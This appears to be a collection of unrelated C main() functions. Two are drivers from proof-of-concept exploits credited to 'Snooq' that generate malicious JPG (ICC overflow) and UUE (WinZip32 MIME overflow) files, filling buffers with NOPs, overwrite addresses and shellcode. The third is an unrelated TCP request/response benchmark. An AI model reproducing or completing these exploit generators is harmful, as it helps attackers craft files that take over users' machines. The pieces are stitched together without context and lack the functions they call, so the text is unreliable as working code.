int main(int argc, char *argv[]) { int i=0, t=TARGET; if (argc==2) { t=atoi(argv[1]); } get_bytes(targets[t-1].jmpADD); printf("\nICC Overflow PoC, By Snooq [[email protected]]\n\n"); printf("-> Generating 'jpg' file for target #%d...\n",t); filladdr(); fillshellcode(); buildfile(); return 0; }
int main(int argc, char *argv[]) { int i=0, t=TARGET; if (argc==2) { t=atoi(argv[1]); } where=targets[t-1].topSEH; what=targets[t-1].jmpADD; printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [[email protected]]\n\n"); memset(buff,NOP,BSIZE); printf("-> Generating 'uue' file for target #%d...\n",t); memcpy(buff,header,HSIZE); filladdr(); memcpy(buff+HSIZE+IDXOFF+4+PAD,shellcode,SSIZE); buildfile(); return 0; }
int main(int argc, char *argv[]) { struct sockaddr_in addr; int so; parse_args(argc, argv); if (args_addr == NULL) { ERROR_DIE("-addr is missing\n"); } if (args_port <= 0) { ERROR_DIE("-port is missing\n"); } if (args_m <= 0) { ERROR_DIE("-m must be > 0\n"); } if (args_m > 8*1024) { ERROR_DIE("-m must be <= 8192\n"); } if (args_sleep < 0) { ERROR_DIE("-sleep must be >= 0\n"); } memset(&addr, 0, sizeof(addr)); if (0 != filladdr(args_addr, &addr)) { ERROR_DIE("filladdr\n"); } addr.sin_port = htons(args_port); #if CHECK_RTO_RETRANS pthread_mutex_init(&checker_lock, NULL); checker_so_num = 0; memset(checker_so, -1, sizeof(checker_so)); { pthread_attr_t attr; pthread_t tid; pthread_attr_init(&attr); pthread_attr_setscope(&attr, PTHREAD_SCOPE_SYSTEM); pthread_create(&tid, &attr, check_thread, NULL); if (args_s) pthread_create(&tid, &attr, stat_thread, NULL); } #endif if (args_s) { int one = 1; int new_conn; int id = 0; struct rr *r; so = socket(AF_INET, SOCK_STREAM, 0); if (so < 0) { PERROR_DIE("socket"); } if (0 != setsockopt(so, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one))) { PERROR_DIE("setsockopt(SO_REUSEADDR)"); } if (0 != bind(so, (const struct sockaddr*)&addr, sizeof(addr))) { PERROR_DIE("bind"); } if (0 != listen(so, args_backlog)) { PERROR_DIE("listen"); } while ((new_conn = accept(so, NULL, NULL)) > 0) { log_msg("server accepted a conn. so=%d id=%d\n", new_conn, id); r = malloc(sizeof(*r)); memset(r, 0, sizeof(*r)); r->id = id++; r->so = new_conn; r->server = 1; pthread_attr_init(&r->attr); pthread_attr_setscope(&r->attr, PTHREAD_SCOPE_SYSTEM); pthread_create(&r->tid, &r->attr, rr_thread, r); // thread frees r // We want to use threads, not events, for this test } } else { struct rr *ra, *r; int i; struct hist prev_hist, cur_hist; uint32_t prev_count, cur_count; ra = malloc(sizeof(*ra) * args_t); memset(ra, 0, sizeof(*ra) * args_t); for (i = 0; i < args_t; i++) { so = socket(AF_INET, SOCK_STREAM, 0); if (so < 0) { PERROR_DIE("socket"); } if (0 != connect(so, (struct sockaddr*)&addr, sizeof(addr))) { PERROR_DIE("connect"); } log_msg("connected to server. so=%d id=%d\n", so, i); r = &ra[i]; r->id = i; r->so = so; r->msg_len = args_m; r->sleep = args_sleep; pthread_attr_init(&r->attr); pthread_attr_setscope(&r->attr, PTHREAD_SCOPE_SYSTEM); pthread_create(&r->tid, &r->attr, rr_thread, r); } // Print stats forever memset(&prev_hist, 0, sizeof(prev_hist)); prev_count = 0; while (1) { sleep(1); // Gather stats from threads memset(&cur_hist, 0, sizeof(cur_hist)); cur_count = 0; for (i = 0; i < args_t; i++) { int j; r = &ra[i]; cur_count += r->stat_count; for (j = 0; j < HIST_BIN_COUNT; j++) cur_hist.bin[j] += r->hist.bin[j]; } printf("%u request-responses/s\n", cur_count - prev_count); for (i = 0; i < HIST_BIN_COUNT; i++) { /* if (cur_hist.bin[i] == 0) continue; */ printf("%d: %u[%u]\n", ((i+1) * HIST_BIN_WIDTH), cur_hist.bin[i], cur_hist.bin[i] - prev_hist.bin[i]); } prev_count = cur_count; // struct copy prev_hist = cur_hist; #if CHECK_RTO_RETRANS print_checker(); #endif } } return 0; }